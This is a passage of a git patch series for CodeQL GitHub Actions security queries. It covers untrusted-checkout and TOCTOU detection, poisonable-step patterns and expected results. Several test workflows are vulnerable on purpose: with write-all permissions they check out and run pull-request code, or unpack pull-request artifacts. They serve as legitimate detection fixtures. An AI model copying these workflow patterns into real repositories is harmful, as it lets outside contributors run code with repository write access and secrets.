a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 3edde8dcf547..ca91fcb9048a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -22,11 +22,6 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a non-privileged context - ( - inNonPrivilegedCompositeAction(checkout) or - inNonPrivilegedJob(checkout) - ) + inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index 498b46090cbf..a4acd7387660 100644 --- a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -5,13 +5,11 @@ on: types: [created] permissions: 'write-all' jobs: - benchmark: - name: Integration Tests + test1: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - runs-on: [ubuntu-latest] + runs-on: ubuntu-latest steps: - # test1 - uses: actions/github-script@v6 name: Get PR branch id: issue @@ -33,7 +31,36 @@ jobs: ref: ${{ fromJson(steps.issue.outputs.result).sha }} - run: bash comment_example/tests.sh - # test2 + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: - uses: actions/checkout@v4 with: submodules: recursive diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 01045ddde5e1..e2c4d9660634 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,15 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | @@ -19,7 +16,6 @@ edges | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | #select -| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml new file mode 100644 index 000000000000..f532e4266ad1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml @@ -0,0 +1,45 @@ +name: Test + + +on: + workflow_run: + workflows: ["Foo"] + types: + - completed + +jobs: + docker: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + outputs: + version-json: ${{ steps.show_versions.outputs.version-json }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchArtifactNacos = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "nacos" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifactNacos.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/nacos.zip', Buffer.from(download.data)); + - run: | + unzip nacos.zip + mkdir nacos + cp -r nacos-* nacos/ + - name: save docker_2 images + run: | + mv ./build_backup/* nacos-e2e/cicd/build/ diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 87289c178af7..78e2afa2747a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -294,6 +294,16 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -322,5 +332,8 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 61c328b7011d..e0164eafac85 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 966a9b1652a6e4f635356fdc7bba27c69c5a2c6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:05:27 +0200 Subject: [PATCH 377/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 34000094dd85..59ab88b42e41 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.12 +version: 0.1.13 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5ccbc7b96578..f25fd70619fd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.12 +version: 0.1.13 groups: [actions, queries] suites: codeql-suites extractor: javascript From e5064f80902240969b4269fa031f79cebd32bbf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:16:50 +0200 Subject: [PATCH 378/707] Improve poisonable steps --- .../actions/security/PoisonableSteps.qll | 4 +- ql/lib/ext/config/poisonable_steps.yml | 1 + .../.github/workflows/poisonable_steps.yml | 25 ++ .../library-tests/poisonable_steps.expected | 18 ++ ql/test/library-tests/poisonable_steps.ql | 5 + ql/test/library-tests/test.expected | 241 ++++++++++++++++++ .../CWE-829/.github/workflows/test7.yml | 58 +++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 24 ++ 9 files changed, 376 insertions(+), 1 deletion(-) create mode 100644 ql/test/library-tests/.github/workflows/poisonable_steps.yml create mode 100644 ql/test/library-tests/poisonable_steps.expected create mode 100644 ql/test/library-tests/poisonable_steps.ql create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index dc0f3876f86f..b0c6f7aa6a9d 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -30,7 +30,9 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) - cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) + cmd = + line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", + group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f13a2a16d359..ff3df1f699c6 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -58,6 +58,7 @@ extensions: data: # TODO: It could also be in the form of `dir/cmd` - ["(\\.\\/)(.*)", 3] + - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - ["(python)\\s+(.*)\\.py", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml new file mode 100644 index 000000000000..3e31507cef1e --- /dev/null +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -0,0 +1,25 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: venv/bin/activate # not supported yet + - run: . venv/bin/activate + - run: echo foo; . venv/bin/activate + - run: echo foo;. venv/bin/activate + - run: echo foo |. venv/bin/activate + - run: ./venv/bin/activate + - run: sh venv/bin/activate.sh + - run: echo $(sh venv/bin/activate.sh) + - run: echo foo; sh venv/bin/activate.sh; echo bar + - run: echo foo | sh venv/bin/activate.sh > output + - run: python venv/bin/activate.py + - run: echo foo; python venv/bin/activate.py + - run: pnpm run test:ct + - run: pip install nbformat && python scripts/generate_notebooks.py + - run: python scripts/generate_theme.py --outfile js/storybook/theme.css + - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + + diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected new file mode 100644 index 000000000000..62ffff3c15c2 --- /dev/null +++ b/ql/test/library-tests/poisonable_steps.expected @@ -0,0 +1,18 @@ +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | diff --git a/ql/test/library-tests/poisonable_steps.ql b/ql/test/library-tests/poisonable_steps.ql new file mode 100644 index 000000000000..1aacdd14d140 --- /dev/null +++ b/ql/test/library-tests/poisonable_steps.ql @@ -0,0 +1,5 @@ +import actions +import codeql.actions.security.PoisonableSteps + +from PoisonableStep step +select step diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index b09473fc1321..efb0bca69528 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,21 +1,25 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -41,6 +45,23 @@ steps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -69,6 +90,23 @@ runSteps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -130,6 +168,23 @@ runStepChildren | .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| 